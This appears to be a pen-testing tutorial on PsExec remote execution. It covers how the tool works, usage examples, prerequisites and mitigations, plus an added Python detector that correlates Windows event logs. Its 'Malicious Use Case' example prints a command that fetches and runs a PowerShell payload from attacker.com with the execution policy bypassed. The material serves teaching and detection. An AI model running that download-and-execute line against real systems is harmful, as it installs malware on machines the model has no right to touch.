As a red teamer or a pen tester, one of your primary objectives is to identify and exploit vulnerabilities in your target systems. One way to do this is by using remote code execution (RCE) techniques. Remote code execution is a vulnerability that allows an attacker to execute code on a target system remotely. Several tools and methods are available to achieve RCE, and one of the most commonly used is PsExec. In this article, we will explore what PsExec is, how it works, and how it can be used by a red teamer or a pen tester to achieve RCE on a target system.
What is PsExec?
PsExec is a powerful command-line tool developed by Sysinternals (now owned by Microsoft) that allows system administrators to execute processes remotely on one or more machines in a network. PsExec can run commands, start services, or launch applications on remote systems. It uses a combination of Windows APIs and remote procedure calls (RPCs) to connect with a remote machine and then execute a command or a process on that machine.
How PsExec Works
To understand how PsExec works, let’s look at the different steps involved in using PsExec to execute a command remotely:
Step 1: Establishing a Connection
The first step in using PsExec is establishing a connection with the target system. To do this, PsExec uses the Windows Service Control Manager (SCM) to start a service called PsExecSvc on the target system. PsExecSvc is a small service that runs as the Local System account and listens for incoming connections from PsExec.
Step 2: Authenticating
Once the connection is established, PsExec sends authentication credentials to the target system to authenticate the user trying to access the system. The credentials can be provided in several ways, including using the -u and -p command-line switches, which allow you to specify a username and password.
Step 3: Executing the Command
After the user is authenticated, PsExec executes the command on the remote system. The command can be any valid command or executable file that can be executed on the target system. PsExec captures the command output and displays it on the local system.
Examples of PsExec Usage
Now that we understand how PsExec works, let’s examine some examples of how it can be used in a red team or pen-testing scenario.
Example 1: Retrieving System Information
One of the simplest things you can do with PsExec is to retrieve system information from a remote system. For example, to retrieve the system information of a machine with the IP address 192.168.1.100, you can run the following command:
psexec \\192.168.1.100 systeminfo
This command will connect to the remote system, execute the systeminfo command, and display the results on your local system.
Example 2: Running Commands on Multiple Systems
PsExec also allows you to run commands on multiple systems simultaneously. For example, to execute the ipconfig command on three remote systems with IP addresses 192.168.1.100, 192.168.1.101, and 192.168.1.102, you can run the following command:
psexec \\192.168.1.100,192.168.1.101,192.168.1.102 ipconfig
This command will execute the ipconfig command on all three remote systems and display the results on your local system.
Example 3: Launching Applications
PsExec can also be used to launch applications on remote systems. For example, to launch the notepad.exe application on a remote system with IP address 192.168.1.100, you can run the following command:
psexec \\192.168.1.100 notepad.exe
This command will launch the Notepad application on the remote system and display it on your local system.
Example 4: Starting Services
PsExec can also be used to start services on remote systems. For example, to start the Windows Remote Management (WinRM) service on a remote system with IP address 192.168.1.100, you can run the following command:
psexec \\192.168.1.100 net start winrm
This command will start the WinRM service on the remote system.
Example 5: Malicious Use Case
While PsExec can be a useful tool for system administrators, attackers can also use it maliciously to achieve RCE on a target system. For example, an attacker could use PsExec to execute a malware payload on a remote system by running the following command:
psexec \\192.168.1.100 cmd.exe /c "powershell.exe -ExecutionPolicy Bypass -Command \"iex (New-Object Net.WebClient).DownloadString('http://attacker.com/malware.ps1')\""
This command will connect to the remote system, execute the cmd.exe command, and then execute a PowerShell script that downloads and executes a malware payload from a remote server controlled by the attacker. This technique is known as a “fileless” malware attack, as it does not involve writing any files to the target system’s disk.
Prerequisites
Before using PsExec to execute commands remotely on a target system, several prerequisites must be met:
- Network Connectivity: PsExec requires network connectivity between the local and target systems. Ensure that the target system is reachable from the local system and that no network firewalls or restrictions could prevent the connection.
- Administrative Access: PsExec requires administrative access to the target system. Ensure that you have administrative privileges on the target system or access to an account with administrative privileges.
- Windows Firewall: PsExec uses the Windows Service Control Manager (SCM) and remote procedure calls (RPCs) to establish a connection with the target system. Ensure the Windows Firewall is not blocking these ports (TCP/445 and TCP/135).
- PsExec Executable: PsExec is a standalone executable that can be downloaded from the Microsoft Sysinternals website. Ensure you have the latest version of PsExec and that it is accessible from the command prompt or directory where you are executing the command.
- Authentication Credentials: PsExec requires authentication credentials to connect to the target system. Make sure that you have a valid username and password or that you are using an account with administrative privileges.
If you ensure that these prerequisites are met, you can use PsExec to execute commands remotely on a target system and test the security of your environment.
Mitigating PsExec-Based Attacks
To mitigate PsExec-based attacks, there are several steps that system administrators can take, including:
- Turn off the PsExec service (PsExecSvc) on all machines that do not require its use.
- Restrict the use of PsExec to authorized users and limit the systems on which it can be used.
- Monitor network traffic for signs of PsExec-based attacks, such as unusual connections to PsExec ports (TCP/445 and TCP/135).
- Deploy endpoint protection solutions that can detect and block known PsExec-based attack techniques.
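The three steps described under "How PsExec Works" each leave a host-side artifact that the monitoring recommended above can key on: the service installation (System log Event ID 7045, where the service PsExec installs is actually named PSEXESVC, the "PsExecSvc" referred to in this article), the network logon that authenticates the caller (Security log Event ID 4624, logon type 3), and the command spawned as a child of PSEXESVC.exe (Security log Event ID 4688; Sysmon Event ID 17/18 for the \PSEXESVC-<host>-<pid>-stdin/stdout/stderr named pipes PsExec uses to relay the command's console). The following detector is an added example, not code from this article or from Sysinternals. The JSON-lines log format, the host names, users, IP addresses and timestamps are constructed for the example; real SIEM exports use different field names. It also goes one step beyond the article: because PsExec's -r switch lets the service be renamed, it additionally matches the "-<pid>-stdin/stdout/stderr" pipe suffix, which survives a rename.

```python
"""Correlate Windows event records into PsExec-style remote execution findings.

Added example (not from the article or from Sysinternals). Input is a
constructed JSON-lines export; field names are an assumption of this example.
"""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Default name of the service PsExec installs (the article calls it PsExecSvc).
SERVICE_NAME = re.compile(r"^psexesvc$", re.I)
# Console relay pipes: \<service>-<host>-<pid>-stdin|stdout|stderr.
# Matching on the suffix also catches a service renamed with PsExec's -r switch.
PIPE_PATTERN = re.compile(r"-\d+-(stdin|stdout|stderr)$", re.I)
# How far back to look for the network logon that authenticated the caller.
LOGON_WINDOW = timedelta(minutes=5)

# Constructed sample log lines; hosts, accounts, IPs and times are made up.
SAMPLE_LOG = r'''
{"ts":"2024-05-01T10:00:00","host":"WS01","log":"Security","id":4624,"logon_type":3,"user":"CORP\\jdoe","src_ip":"192.168.1.50"}
{"ts":"2024-05-01T10:00:01","host":"WS01","log":"System","id":7045,"service_name":"PSEXESVC","image_path":"%SystemRoot%\\PSEXESVC.exe","account":"LocalSystem"}
{"ts":"2024-05-01T10:00:02","host":"WS01","log":"Sysmon","id":17,"pipe":"\\PSEXESVC-ADMINPC-1234-stdin","image":"C:\\Windows\\PSEXESVC.exe"}
{"ts":"2024-05-01T10:00:02","host":"WS01","log":"Security","id":4688,"new_process":"C:\\Windows\\System32\\cmd.exe","parent_process":"C:\\Windows\\PSEXESVC.exe","user":"CORP\\jdoe"}
{"ts":"2024-05-01T11:30:00","host":"WS02","log":"System","id":7045,"service_name":"Spooler","image_path":"%SystemRoot%\\System32\\spoolsv.exe","account":"LocalSystem"}
{"ts":"2024-05-01T12:00:00","host":"WS03","log":"System","id":7045,"service_name":"updatesvc","image_path":"%SystemRoot%\\updatesvc.exe","account":"LocalSystem"}
{"ts":"2024-05-01T12:00:01","host":"WS03","log":"Sysmon","id":17,"pipe":"\\updatesvc-HOST-77-stdin","image":"C:\\Windows\\updatesvc.exe"}
'''


def parse_log(text: str) -> list[dict]:
    """Parse the JSON-lines export into a list of event dicts."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def _ts(event: dict) -> datetime:
    return datetime.fromisoformat(event["ts"])


def detect_psexec(events: list[dict]) -> list[dict]:
    """Return one finding per host that shows PsExec-style execution artifacts.

    Each finding lists the indicators seen (service install, relay pipe,
    child of PSEXESVC.exe) and, when a network logon precedes them within
    LOGON_WINDOW, the account and source IP that authenticated (Step 2).
    """
    by_host: dict[str, list[dict]] = defaultdict(list)
    for ev in events:
        by_host[ev["host"]].append(ev)

    findings = []
    for host, evs in sorted(by_host.items()):
        evs.sort(key=_ts)  # stable sort keeps log order for equal timestamps
        indicators: list[tuple[datetime, str, str]] = []
        for ev in evs:
            if ev["id"] == 7045 and SERVICE_NAME.match(ev.get("service_name", "")):
                # Step 1: SCM installed the PsExec service.
                indicators.append((_ts(ev), "service_install",
                                   f"{ev['service_name']} installed from {ev['image_path']}"))
            elif ev["id"] in (17, 18) and PIPE_PATTERN.search(ev.get("pipe", "")):
                # Step 3: console relay pipe created/connected (rename-resistant).
                indicators.append((_ts(ev), "named_pipe", ev["pipe"]))
            elif ev["id"] == 4688 and ev.get("parent_process", "").lower().endswith("\\psexesvc.exe"):
                # Step 3: the requested command runs as a child of the service.
                indicators.append((_ts(ev), "child_process",
                                   f"{ev['new_process']} spawned by {ev['parent_process']}"))
        if not indicators:
            continue

        finding = {"host": host, "source_ip": None, "user": None,
                   "indicators": [(kind, detail) for _, kind, detail in indicators]}
        first_seen = indicators[0][0]
        for ev in evs:
            # Step 2: the network (type 3) logon that preceded the artifacts.
            if (ev["id"] == 4624 and ev.get("logon_type") == 3
                    and first_seen - LOGON_WINDOW <= _ts(ev) <= first_seen):
                finding["source_ip"] = ev.get("src_ip")
                finding["user"] = ev.get("user")
                break
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in detect_psexec(parse_log(SAMPLE_LOG)):
        print(json.dumps(finding, indent=2))
```

Run against the sample, WS01 is reported with all three indicators and is attributed to the network logon from 192.168.1.50, WS02 (a legitimate Spooler service install) is not reported, and WS03 is reported on the pipe suffix alone even though its service was renamed. The Spooler line is there to show why matching only on "a service was installed" is too noisy; the service name, the binary dropped into the Windows directory, and the relay pipes are the discriminators.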
Conclusion
PsExec is a powerful tool that system administrators can use to remotely execute commands on multiple systems simultaneously. However, attackers can also use it maliciously to achieve RCE on a target system. Red teamers and pen testers can use PsExec to test the security of their target systems and identify vulnerabilities that attackers could exploit. By understanding how PsExec works and how it can be used, security professionals can better defend against PsExec-based attacks and protect their systems from compromise.